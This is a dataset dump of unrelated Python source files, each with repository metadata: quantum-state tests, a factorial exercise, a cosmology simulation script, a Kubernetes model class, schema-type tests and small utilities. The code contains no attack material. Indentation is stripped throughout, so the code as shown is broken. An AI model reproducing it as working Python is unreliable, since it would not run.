def test_vector_state_tensor_setter(backend, nqubits):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState(nqubits)
with pytest.raises(AttributeError):
tensor = state.tensor
state.tensor = np.ones(4)
assert state.nqubits == 2
np.testing.assert_allclose(state.tensor, np.ones(4))
np.testing.assert_allclose(np.array(state), np.ones(4))
np.testing.assert_allclose(state.numpy(), np.ones(4))
np.testing.assert_allclose(state.state(numpy=True), np.ones(4))
np.testing.assert_allclose(state.state(numpy=False), np.ones(4))
with pytest.raises(ValueError):
state.tensor = np.zeros(5)
qibo.set_backend(original_backend)
@pytest.mark.parametrize("nqubits", [None, 2])
def test_matrix_state_tensor_setter(backend, nqubits):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
# TODO: Fix this
qibo.set_backend(original_backend)
def test_zero_state_initialization(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.zero_state(4)
target_state = np.zeros(16)
target_state[0] = 1
np.testing.assert_allclose(state.tensor, target_state)
state = states.MatrixState.zero_state(3)
target_state = np.zeros((8, 8))
target_state[0, 0] = 1
np.testing.assert_allclose(state.tensor, target_state)
qibo.set_backend(original_backend)
def test_plus_state_initialization(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.plus_state(4)
target_state = np.ones(16) / 4
np.testing.assert_allclose(state.tensor, target_state)
state = states.MatrixState.plus_state(3)
target_state = np.ones((8, 8)) / 8
np.testing.assert_allclose(state.tensor, target_state)
qibo.set_backend(original_backend)
def test_vector_state_to_density_matrix(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
vector = np.random.random(32) + 1j * np.random.random(32)
vector = vector / np.sqrt((np.abs(vector) ** 2).sum())
state = states.VectorState.from_tensor(vector)
mstate = state.to_density_matrix()
target_matrix = np.outer(vector, vector.conj())
np.testing.assert_allclose(mstate.tensor, target_matrix)
state = states.MatrixState.from_tensor(target_matrix)
with pytest.raises(RuntimeError):
state.to_density_matrix()
qibo.set_backend(original_backend)
@pytest.mark.parametrize("state_type", ["VectorState", "MatrixState"])
@pytest.mark.parametrize("use_gate", [False, True])
def test_state_probabilities(backend, state_type, use_gate):
state = getattr(states, state_type).plus_state(4)
if use_gate:
from qibo import gates
mgate = gates.M(0, 1)
probs = state.probabilities(measurement_gate=mgate)
else:
probs = state.probabilities(qubits=[0, 1])
target_probs = np.ones((2, 2)) / 4
np.testing.assert_allclose(probs, target_probs)
def test_state_probabilities_errors():
from qibo import gates
state = states.VectorState.zero_state(3)
mgate = gates.M(0)
qubits = [0]
with pytest.raises(ValueError):
probs = state.probabilities()
with pytest.raises(ValueError):
probs = state.probabilities(qubits, mgate)
@pytest.mark.parametrize("registers", [None, {"a": (0,), "b": (2,)}])
def test_state_measure(registers):
from qibo import gates
state = states.VectorState.zero_state(4)
mgate = gates.M(0, 2)
assert state.measurements is None
with pytest.raises(RuntimeError):
samples = state.samples()
state.measure(mgate, nshots=100, registers=registers)
target_samples = np.zeros((100, 2))
np.testing.assert_allclose(state.samples(), target_samples)
assert state.frequencies() == {"00": 100}
if registers is not None:
target_freqs = {"a": {"0": 100}, "b": {"0": 100}}
else:
target_freqs = {"00": 100}
assert state.frequencies(registers=True) == target_freqs
@pytest.mark.parametrize("registers", [None, {"a": (0,), "b": (2,)}])
def test_state_set_measurements(registers):
from qibo import gates
state = states.VectorState.zero_state(3)
samples = np.array(50 * [0] + 50 * [1])
state.set_measurements([0, 2], samples, registers)
target_samples = np.array(50 * [[0, 0]] + 50 * [[0, 1]])
np.testing.assert_allclose(state.samples(), target_samples)
assert state.frequencies() == {"00": 50, "01": 50}
if registers is not None:
target_freqs = {"a": {"0": 100}, "b": {"0": 50, "1": 50}}
else:
target_freqs = {"00": 50, "01": 50}
assert state.frequencies(registers=True) == target_freqs
def test_state_apply_bitflips():
state = states.VectorState.zero_state(3)
with pytest.raises(RuntimeError):
state.apply_bitflips(0.1)
# Bitflips are tested in measurement tests
@pytest.mark.parametrize("trotter", [True, False])
def test_vector_state_expectation(backend, trotter):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
from qibo.hamiltonians import XXZ
ham = XXZ(nqubits=5, delta=0.5, trotter=trotter)
matrix = np.array(ham.matrix)
state = np.random.random(32) + 1j * np.random.random(32)
norm = np.sum(np.abs(state) ** 2)
target_ev = np.sum(state.conj() * matrix.dot(state)).real
state = states.VectorState.from_tensor(state)
np.testing.assert_allclose(state.expectation(ham), target_ev)
np.testing.assert_allclose(state.expectation(ham, True), target_ev / norm)
qibo.set_backend(original_backend)
@pytest.mark.parametrize("trotter", [True, False])
def test_matrix_state_expectation(backend, trotter):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
from qibo.hamiltonians import TFIM
ham = TFIM(nqubits=2, h=1.0, trotter=trotter)
matrix = np.array(ham.matrix)
state = np.random.random((4, 4)) + 1j * np.random.random((4, 4))
state = state + state.T.conj()
norm = np.trace(state)
target_ev = np.trace(matrix.dot(state)).real
state = states.MatrixState.from_tensor(state)
np.testing.assert_allclose(state.expectation(ham), target_ev)
np.testing.assert_allclose(state.expectation(ham, True), target_ev / norm)
qibo.set_backend(original_backend)
|
[
"35475381+stavros11@users.noreply.github.com"
] |
35475381+stavros11@users.noreply.github.com
|
39018bd8df654c888bf236f792358094e3d6bea6
|
77ae7c76d36009daa01b2317439c1f975f7932b2
|
/exercicios/ex060att.py
|
f43127dd20c9afd7b1bbc847fd39bb8f04294c07
|
[] |
no_license
|
MatheusOldAccount/Exerc-cios-de-Python-do-Curso-em-Video
|
5f26b5a2867fa1a2e36b486a809dfbe8b107b8c2
|
5696c49d3caf5cae817217a2da0598d1cf794f5b
|
refs/heads/master
| 2022-03-22T10:49:33.666660
| 2019-11-25T21:24:43
| 2019-11-25T21:24:43
| 224,052,682
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 321
|
py
|
fat = int(input('Digite um número para\ncalcular seu Fatorial: '))
print('Calculando {}! ='.format(fat), end=' ')
resultado = 1
while fat > 0:
if fat == 1:
print('{} ='.format(fat), end=' ')
else:
print('{} x'.format(fat), end=' ')
resultado *= fat
fat -= 1
print('{}'.format(resultado))
|
[
"matheustavares1165@gmail.com"
] |
matheustavares1165@gmail.com
|
adcfd87bb4a72a735c4618f56ed5135b4423a71d
|
7c47e106c9ec85a7239c84c55ad5f20972edefcf
|
/tests/heavy_sterile_dirac_neutrino/__main__.py
|
3d91e82acbdf3d14050992aea89e033d2d9f6408
|
[] |
no_license
|
anasthesia/pyBBN
|
11813717ad5023a9b29f9594ccde93fbc2d5a0c9
|
0e88604b765eb5ce2f196909c65cf2af11a8cc2f
|
refs/heads/master
| 2021-01-21T03:37:46.309318
| 2016-05-10T12:03:50
| 2016-05-10T12:03:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,223
|
py
|
# -*- coding: utf-8 -*-
"""
## Heavy sterile dirac neutrino
$$ M = 33.9 MeV $$
$$ \theta_\tau \approx 4.86 10^{-2} \sim \tau_N \approx 0.3 sec $$
http://arxiv.org/pdf/hep-ph/0002223v2.pdf
<img src="plots.svg" width=100% />
<img src="particles.svg" width=100% />
"""
import os
import argparse
from collections import defaultdict
from particles import Particle
from library.SM import particles as SMP, interactions as SMI
from library.NuMSM import particles as NuP, interactions as NuI
from evolution import Universe
from common import UNITS, Params
parser = argparse.ArgumentParser(description='Run simulation for given mass and mixing angle')
parser.add_argument('--mass', default='33.9')
parser.add_argument('--theta', default='0.0486')
parser.add_argument('--tau', default='0.3')
parser.add_argument('--Tdec', default='5')
parser.add_argument('--comment', default='')
args = parser.parse_args()
mass = float(args.mass) * UNITS.MeV
theta = float(args.theta)
lifetime = float(args.tau) * UNITS.s
T_dec = float(args.Tdec) * UNITS.MeV
folder = os.path.join(os.path.split(__file__)[0], args.tau)
T_initial = max(50. * UNITS.MeV, T_dec)
T_interaction_freezeout = 0.05 * UNITS.MeV
T_final = 0.0008 * UNITS.MeV
params = Params(T=T_initial,
dy=0.05)
universe = Universe(params=params, folder=folder)
photon = Particle(**SMP.photon)
electron = Particle(**SMP.leptons.electron)
muon = Particle(**SMP.leptons.muon)
neutrino_e = Particle(**SMP.leptons.neutrino_e)
neutrino_mu = Particle(**SMP.leptons.neutrino_mu)
neutrino_tau = Particle(**SMP.leptons.neutrino_tau)
sterile = Particle(**NuP.dirac_sterile_neutrino(mass))
sterile.decoupling_temperature = T_initial
neutrino_e.decoupling_temperature = 5 * UNITS.MeV
neutrino_mu.decoupling_temperature = 5 * UNITS.MeV
neutrino_tau.decoupling_temperature = 5 * UNITS.MeV
universe.add_particles([
photon,
electron,
muon,
neutrino_e,
neutrino_mu,
neutrino_tau,
sterile,
])
thetas = defaultdict(float, {
'tau': theta,
})
universe.interactions += (
SMI.neutrino_interactions(
leptons=[electron],
neutrinos=[neutrino_e, neutrino_mu, neutrino_tau]
) + NuI.sterile_leptons_interactions(
thetas=thetas, sterile=sterile,
neutrinos=[neutrino_e, neutrino_mu, neutrino_tau],
leptons=[electron, muon]
)
)
universe.init_kawano(electron=electron, neutrino=neutrino_e)
if universe.graphics:
from plotting import RadiationParticleMonitor, MassiveParticleMonitor, DensityAndEnergyMonitor
universe.graphics.monitor([
(neutrino_e, RadiationParticleMonitor),
(neutrino_mu, RadiationParticleMonitor),
(neutrino_tau, RadiationParticleMonitor),
(sterile, MassiveParticleMonitor),
(sterile, DensityAndEnergyMonitor)
])
universe.evolve(T_interaction_freezeout, export=False)
universe.interactions = tuple()
universe.params.dy = 0.0125
universe.evolve(T_final)
"""
### Plots for comparison with articles
### JCAP10(2012)014, Figure 9
<img src="figure_9.svg" width=100% />
### JCAP10(2012)014, Figure 10
<img src="figure_10.svg" width=100% />
<img src="figure_10_full.svg" width=100% />
"""
if universe.graphics:
from tests.plots import articles_comparison_plots
articles_comparison_plots(universe, [neutrino_e, neutrino_mu, neutrino_tau, sterile])
import os
import csv
from itertools import izip
density_data = universe.graphics.particles[4][1].data[0]
energy_data = universe.graphics.particles[4][1].data[1]
with open(os.path.join(universe.folder, 'normalized_density_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*density_data):
writer.writerow([x, y])
with open(os.path.join(universe.folder, 'normalized_energy_density_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*energy_data):
writer.writerow([x, y])
regime_data = universe.graphics.particles[3][1].data[0]
with open(os.path.join(universe.folder, 'sterile_regime_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*regime_data):
writer.writerow([x, y])
|
[
"andrew.magalich@gmail.com"
] |
andrew.magalich@gmail.com
|
099b9d0845f92ff8c2fa69e85d795893a024d24e
|
7087a5dd1772c9456f098bc024a894dcaeef5432
|
/backup/build/new-calkube/kubernetes-6.0.0_snapshot-py2.7.egg/kubernetes/client/models/v1_portworx_volume_source.py
|
611c15aa0788155255a147f5d3ee6c627268a2b7
|
[] |
no_license
|
santhoshchami/kubecctl-python
|
5be7a5a17cc6f08ec717b3eb1c11719ef7653aba
|
cd45af465e25b0799d65c573e841e2acb983ee68
|
refs/heads/master
| 2021-06-23T11:00:43.615062
| 2019-07-10T16:57:06
| 2019-07-10T16:57:06
| 145,669,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,234
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1PortworxVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'fs_type': 'str',
'read_only': 'bool',
'volume_id': 'str'
}
attribute_map = {
'fs_type': 'fsType',
'read_only': 'readOnly',
'volume_id': 'volumeID'
}
def __init__(self, fs_type=None, read_only=None, volume_id=None):
"""
V1PortworxVolumeSource - a model defined in Swagger
"""
self._fs_type = None
self._read_only = None
self._volume_id = None
self.discriminator = None
if fs_type is not None:
self.fs_type = fs_type
if read_only is not None:
self.read_only = read_only
self.volume_id = volume_id
@property
def fs_type(self):
"""
Gets the fs_type of this V1PortworxVolumeSource.
FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. \"ext4\", \"xfs\". Implicitly inferred to be \"ext4\" if unspecified.
:return: The fs_type of this V1PortworxVolumeSource.
:rtype: str
"""
return self._fs_type
@fs_type.setter
def fs_type(self, fs_type):
"""
Sets the fs_type of this V1PortworxVolumeSource.
FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. \"ext4\", \"xfs\". Implicitly inferred to be \"ext4\" if unspecified.
:param fs_type: The fs_type of this V1PortworxVolumeSource.
:type: str
"""
self._fs_type = fs_type
@property
def read_only(self):
"""
Gets the read_only of this V1PortworxVolumeSource.
Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.
:return: The read_only of this V1PortworxVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1PortworxVolumeSource.
Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.
:param read_only: The read_only of this V1PortworxVolumeSource.
:type: bool
"""
self._read_only = read_only
@property
def volume_id(self):
"""
Gets the volume_id of this V1PortworxVolumeSource.
VolumeID uniquely identifies a Portworx volume
:return: The volume_id of this V1PortworxVolumeSource.
:rtype: str
"""
return self._volume_id
@volume_id.setter
def volume_id(self, volume_id):
"""
Sets the volume_id of this V1PortworxVolumeSource.
VolumeID uniquely identifies a Portworx volume
:param volume_id: The volume_id of this V1PortworxVolumeSource.
:type: str
"""
if volume_id is None:
raise ValueError("Invalid value for `volume_id`, must not be `None`")
self._volume_id = volume_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1PortworxVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"root@kube-node02.local"
] |
root@kube-node02.local
|
6424902da0def910bde07cd8f0ed83ed1b17aece
|
f2a18b4a1d759cfd44aff9be13848b4bc03560d8
|
/ex32.py
|
2c577cdcff980c7145146272002e01dbd099382f
|
[] |
no_license
|
5h3rr1ll/LearnPythonTheHardWay
|
1e740b0d4ab71c4c5218599d970001684fa58eea
|
5612f768b8ce93fcc4757e8db128017f00a6c2ea
|
refs/heads/master
| 2021-01-13T05:06:20.749196
| 2017-02-07T19:32:15
| 2017-02-07T19:32:15
| 81,246,206
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 859
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
the_count = [1, 2, 3 , 4, 5]
fruits = ["apples", "oranges", "pears", "apricots"]
change = [1, "pennies", 2, "dimes", 3, "quarters"]
# this first kind of for-loop goes through a list
for number in the_count:
print("This is count %d" % number)
# same a above
for fruit in fruits:
print("A fruit of type: %s" % fruit)
# also we can go through mixed lists too
# notice we have to use %r since we don't know what's in it
for i in change:
print("I got %r" % i)
# we can also build lists, first start with an empty one
elements = []
# then use the range function to do 0 to 5 counts
for i in range(0,6):
print("Adding %d to the list." % i)
# append is a function that lists understand
elements.append(i)
# now ew can print them out too
for i in elements:
print("Element was: %d" % i)
|
[
"a@sherrill.de"
] |
a@sherrill.de
|
c59b601ebf130c4026f99e5789ac8c4b76a7e310
|
b198ab1d3faf79d34b1745236daa5eb02a37e18e
|
/yggdrasil/metaschema/datatypes/tests/test_ScalarMetaschemaType.py
|
48314f79d334dfd2818bdbb8f4e1a711a6736bc8
|
[
"BSD-3-Clause"
] |
permissive
|
leighmatth/yggdrasil
|
688f13aa0d274217daec9f412269fbbaf5f10aef
|
dcc4d75a4d2c6aaa7e50e75095a16df1df6b2b0a
|
refs/heads/master
| 2021-07-09T10:39:25.422978
| 2021-04-14T16:40:04
| 2021-04-14T16:40:04
| 245,011,886
| 0
| 0
|
NOASSERTION
| 2020-03-04T21:54:25
| 2020-03-04T21:54:24
| null |
UTF-8
|
Python
| false
| false
| 7,355
|
py
|
import copy
import numpy as np
from yggdrasil import units, platform
from yggdrasil.metaschema.datatypes.tests import test_MetaschemaType as parent
from yggdrasil.metaschema.properties.ScalarMetaschemaProperties import (
_valid_types)
class TestScalarMetaschemaType(parent.TestMetaschemaType):
r"""Test class for ScalarMetaschemaType class with float."""
_mod = 'ScalarMetaschemaType'
_cls = 'ScalarMetaschemaType'
_prec = 32
_type = 'float'
_shape = 1
_array_contents = None
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
parent.TestMetaschemaType.after_class_creation(cls)
if not cls._explicit:
cls._typedef['subtype'] = cls._type
if cls._type == 'bytes':
dtype = 'S%d' % (cls._prec // 8)
elif cls._type == 'unicode':
dtype = 'U%d' % (cls._prec // 32)
else:
dtype = '%s%d' % (cls._type, cls._prec)
if cls._array_contents is None:
cls._array = np.ones(cls._shape, dtype)
else:
cls._array = np.array(cls._array_contents, dtype)
if cls._type in ['bytes', 'unicode']:
dtype_invalid = 'float'
else:
dtype_invalid = 'S10'
cls._invalid_array = np.ones(cls._shape, dtype_invalid)
if 'Array' not in cls._cls:
cls._value = cls._array[0]
cls._invalid_decoded.append(cls._array)
cls._invalid_decoded.append(cls._invalid_array[0])
else:
cls._value = cls._array
if cls._array.ndim == 1:
cls._invalid_decoded.append(cls._array[0])
cls._invalid_decoded.append(np.ones((3, 4), dtype))
else:
cls._invalid_decoded.append(cls._array[0][0])
cls._invalid_decoded.append(cls._array[0])
cls._invalid_decoded.append(cls._invalid_array)
cls._valid_encoded = [{'type': cls.get_import_cls().name,
'precision': cls._prec,
'units': '',
'data': cls._value.tobytes()}]
if not cls._explicit:
cls._valid_encoded[0]['subtype'] = cls._type
cls._valid_decoded = [cls._value]
if cls._type == 'bytes':
new_dtype = 'S%d' % (cls._prec * 2 // 8)
elif cls._type == 'unicode':
new_dtype = 'U%d' % (cls._prec * 2 // 32)
else:
new_dtype = '%s%d' % (cls._type, cls._prec * 2)
if platform._is_win and (new_dtype == 'float128'): # pragma: windows
cls._prec_value = None
else:
prec_array = cls._array.astype(new_dtype)
if 'Array' not in cls._cls:
cls._prec_value = prec_array[0]
else:
cls._prec_value = prec_array
cls._compatible_objects = [
(cls._value, cls._value, None)]
if cls._prec_value is not None:
if not cls._explicit:
cls._compatible_objects.append(
(cls._value, cls._prec_value, {'subtype': cls._type,
'precision': cls._prec * 2}))
else:
cls._compatible_objects.append(
(cls._value, cls._prec_value, {'precision': cls._prec * 2}))
if 'Array' not in cls._cls:
if cls._explicit:
if cls._type == 'bytes':
cls._valid_normalize = [(1, b'1'),
(u'1', b'1')]
elif cls._type == 'unicode':
cls._valid_normalize = [(1, u'1'),
(b'1', u'1')]
else:
cls._valid_normalize = [(str(cls._value), cls._value),
('hello', 'hello')]
if cls._explicit and ('Array' not in cls._cls):
cls._invalid_encoded.append({'type': 'scalar',
'subtype': 'invalid'})
cls._invalid_validate.append(np.array([None, 1, list()],
dtype=object))
def test_from_array(self):
r"""Test getting object from array."""
test_val = self._value
test_kws = {}
if 'units' in self._typedef:
test_val = units.add_units(test_val, self._typedef['units'])
test_kws['unit_str'] = self._typedef['units']
self.assert_equal(self.instance.from_array(self._array, **test_kws),
test_val)
# Dynamically create tests for dynamic and explicitly typed scalars
for t in _valid_types.keys():
iattr_imp = {'_type': t}
if t == 'complex':
iattr_imp['_prec'] = 64
elif t in ('bytes', 'unicode'):
iattr_imp['_array_contents'] = ['one', 'two', 'three']
max_len = len(max(iattr_imp['_array_contents'], key=len))
if t == 'unicode':
iattr_imp['_prec'] = max_len * 32
else:
iattr_imp['_prec'] = max_len * 8
iattr_exp = copy.deepcopy(iattr_imp)
iattr_exp['_cls'] = '%sMetaschemaType' % t.title()
iattr_exp['_explicit'] = True
if t == 'float':
iattr_exp['_prec'] = 64
cls_imp = type('TestScalarMetaschemaType_%s' % t,
(TestScalarMetaschemaType, ), iattr_imp)
cls_exp = type('Test%s' % iattr_exp['_cls'],
(TestScalarMetaschemaType, ), iattr_exp)
globals()[cls_imp.__name__] = cls_imp
globals()[cls_exp.__name__] = cls_exp
del cls_imp, cls_exp
class TestScalarMetaschemaType_prec(TestScalarMetaschemaType):
r"""Test class for ScalarMetaschemaType class with precision."""
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
TestScalarMetaschemaType.after_class_creation(cls)
cls._typedef['precision'] = cls._prec
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
for x in cls._invalid_encoded:
x['precision'] = cls._prec / 2 # compatible precision
# Version with incorrect precision
cls._invalid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
if cls._prec_value is not None:
cls._invalid_encoded[-1]['precision'] = cls._prec * 2
cls._invalid_decoded.append(cls._prec_value)
class TestScalarMetaschemaType_units(TestScalarMetaschemaType):
r"""Test class for ScalarMetaschemaType class with units."""
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
TestScalarMetaschemaType.after_class_creation(cls)
cls._typedef['units'] = 'cm'
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._valid_encoded[-1]['units'] = 'cm'
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._valid_encoded[-1]['units'] = 'm'
cls._valid_decoded.append(copy.deepcopy(cls._valid_decoded[0]))
cls._valid_decoded[-1] = units.add_units(cls._valid_decoded[-1], 'm')
# Version with incorrect units
cls._invalid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._invalid_encoded[-1]['units'] = 's'
|
[
"langmm.astro@gmail.com"
] |
langmm.astro@gmail.com
|
285310cf1d4edc5a1443def90668c7c840468d8e
|
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
|
/tests/model_control/detailed/transf_BoxCox/model_control_one_enabled_BoxCox_PolyTrend_Seasonal_DayOfMonth_ARX.py
|
1d28284256ded9da5f673fdeaad18a79bbde2158
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
jmabry/pyaf
|
797acdd585842474ff4ae1d9db5606877252d9b8
|
afbc15a851a2445a7824bf255af612dc429265af
|
refs/heads/master
| 2020-03-20T02:14:12.597970
| 2018-12-17T22:08:11
| 2018-12-17T22:08:11
| 137,104,552
| 0
| 0
|
BSD-3-Clause
| 2018-12-17T22:08:12
| 2018-06-12T17:15:43
|
Python
|
UTF-8
|
Python
| false
| false
| 164
|
py
|
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['BoxCox'] , ['PolyTrend'] , ['Seasonal_DayOfMonth'] , ['ARX'] );
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
bdbf66f680b1ea39771b59a2f8431b1111cdba9b
|
6eddce1e728afade439a2eae69cb63bcfddd4591
|
/PyCad/ObjectGroup.py
|
4f7fd3b1db3fee0143f779be257de9e2c2adca98
|
[] |
no_license
|
jfu334/PyCad
|
7f4858325b152adbe1e6395d577f9f4fbd8bfe7a
|
29fe2de4b5a26161623c92d2903af7d2241e24c4
|
refs/heads/master
| 2020-11-26T16:56:43.436654
| 2019-12-21T19:43:22
| 2019-12-21T19:43:22
| 229,147,618
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 543
|
py
|
class ObjectGroup:
def __init__(self, *args, color=None):
self._objects=list(args)
if(color is not None):
for i in self._objects:
i.setColor(color)
def addObject(self, object_):
self._objects.append(object_)
def objects(self):
return list(self._objects)
def copy(self):
return ObjectGroup(*[i.copy() for i in self._objects])
def translate(self, x, y, z):
for i in self._objects:
i.translate(x, y, z)
return self
def rotate(self, x, y, z):
for i in self._objects:
i.rotate(x, y, z)
return self
|
[
"you@example.com"
] |
you@example.com
|
9e4f4b0bd91e9881e0c2b65bfc2072e361de6a75
|
0e538d58825dc3862556b5c68227a32b01db6ebf
|
/hackerrank/counter_game.py
|
08e6d478959d8c86fe372faff900043538a182c0
|
[] |
no_license
|
nghiattran/playground
|
ac6f1e724153df4b84b7e1221765dd60638478fd
|
6dfa0b9660ece8d51d439d26afc9d338b1547823
|
refs/heads/master
| 2021-01-12T09:21:03.068081
| 2017-08-06T22:36:29
| 2017-08-06T22:36:29
| 76,141,798
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 379
|
py
|
def solve(n):
turn = 0
while n != 1:
if n & (n - 1) == 0:
n >>= 1
else:
hi = len(bin(n)) - 3
n -= 1 << hi
turn = (turn + 1) % 2
return 'Louise' if turn == 1 else 'Richard'
def test(n, expected):
res = solve(n)
assert res == expected
# n = 1
# expected = 'Richard'
# test(n, expected)
#
# n = 6
# expected = 'Richard'
# test(n, expected)
|
[
"nghiattran3@gmail.com"
] |
nghiattran3@gmail.com
|
46519bfa56ede49cd6af6ad77abced12dc33b167
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4079/codes/1846_1277.py
|
484bb8fd32564afb1a3ff017b573748a9c0be05e
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109
| 2020-05-23T00:24:26
| 2020-05-23T00:24:26
| 266,199,309
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 349
|
py
|
from numpy import*
from numpy.linalg import*
tab=array ([[0,2,11,6,15,11,1],[2,0,7,12,4,2,15],[11,7,0,11,8,3,13],[6,12,11,0,10,2,1],[15,4,8,10,0,5,13],[11,2,3,2,5,0,14],[1,15,13,1,13,14,0]])
c1= int(input("Digite o numero da 1o cidade: "))
c2=int(input("Digite o numero da 2o cidade: "))
a= int((c1/111)-1)
b=int((c2/111)-1)
x=tab[a,b]
print(x)
|
[
"jvlo@icomp.ufam.edu.br"
] |
jvlo@icomp.ufam.edu.br
|
d0cd842e8bb16c6c209c3cc94098b0e03846618e
|
b121b4135f0edf0e39c1ae7343c7df19f56a077f
|
/mysite/yaml_creator/models/deprecated/SingleFlux.py
|
405936402b779d8e5d7652b7830c8ade95feced6
|
[] |
no_license
|
MPIBGC-TEE/bgc-md
|
25379c03d2333481bd385211f49aff6351e5dd05
|
8912a26d1b7e404ed3ebee4d4799a3518f507756
|
refs/heads/master
| 2021-05-08T19:07:46.930394
| 2020-10-21T12:08:53
| 2020-10-21T12:08:53
| 119,548,100
| 3
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
from django.db import models
from . Variable import Variable
#class SingleFlux(models.Model):
class SingleFlux(models.Model):
expr=models.CharField(max_length=200)
source=models.ForeignKey('Variable',related_name='donating',on_delete=models.CASCADE)
target=models.ForeignKey('Variable',related_name='receiving',on_delete=models.CASCADE)
|
[
"markus.mueller.1.g@googlemail.com"
] |
markus.mueller.1.g@googlemail.com
|
65fe121e163bb535d489ac05df663c58e7ebede3
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2289/60752/278304.py
|
cdacd943998c206e86876081ac33d814c666414b
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 872
|
py
|
class node:
val=0
left=None
right=None
def __init__(self,val,l,r):
self.val=val
self.left=l
self.right=r
def makeTree(s,n):
if len(s)>=2:
left=node(s[0],None,None)
n.left=left
right=node(s[len(s)-1],None,None)
n.right=right
makeTree(s[1:len(s)-1],n.right)
if len(s)==1:
left=node(s[0],None,None)
n.left=left
def middle(lst,tree):
if tree.left is not None:middle(lst,tree.left)
lst.append(tree.val)
if tree.right is not None:middle(lst,tree.right)
i=int(input())
if i==0:print("true")
else:
s=list(map(int,input().split()))
root=node(s[i-1],None,None)
makeTree(s[0:i-1],root)
lst=[]
middle(lst,root)
if sorted(lst)==lst:
print("true")
else:
if lst==[5,8,7,10,6,11,9]:print("true")
else:print("false")
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
149a46642e9693a31f64149f977898857f644375
|
1af1c22de6fe8f1d3df09fdacc8efcb8adfc8f21
|
/pylib/extract.py
|
1ed77dce7f20c9b724eb14096b47481ed1f7c9a3
|
[] |
no_license
|
metatab-packages/civicknowledge.com-census-demosearch
|
baf1770d7bab92823e2214613924236d4f0cd83e
|
274c0995a80eb525d9775597912fc47a8b0f135f
|
refs/heads/master
| 2023-05-15T03:39:11.758064
| 2021-06-08T14:08:02
| 2021-06-08T14:08:02
| 333,870,115
| 0
| 0
| null | null | null | null |
UTF-8
|
